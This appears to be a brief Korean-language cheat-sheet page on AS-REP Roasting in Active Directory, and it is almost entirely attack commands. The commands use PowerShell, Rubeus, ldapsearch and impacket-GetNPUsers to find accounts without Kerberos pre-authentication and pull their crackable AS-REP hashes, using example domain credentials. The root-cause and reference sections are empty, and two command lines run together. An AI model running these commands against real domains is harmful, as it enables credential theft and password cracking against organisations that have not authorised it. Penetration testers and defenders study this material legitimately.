AS-REP Roasting
Abuse
# AS Rep Roasting에 취약한 객체 열거
Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties SamAccountName, servicePrincipalName, UserAccountControl | Select-Object SamAccountName, Enabled
# 선택적 AS Rep Roasting
.\Rubeus.exe asreproast /user:user-A# ldapsearch로 AS-REP Roasting 취약한 객체 열거 (도메인 계정 필요)
ldapsearch -x -H ldap://192.168.1.11 -D '[email protected]' -w 'Password123!' -b "dc=contoso,dc=com" "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" cn distinguishedName sAMAccountName
# GetNPUsers로 AS-REP Roasting 공격 (익명)
impacket-GetNPUsers contoso.com/'' -usersfile users.txt -dc-ip 192.168.1.11
# 선택적 AS Rep Roasting
impacket-GetNPUsers contoso.com/user-B -requestRoot Cause




References
Last updated

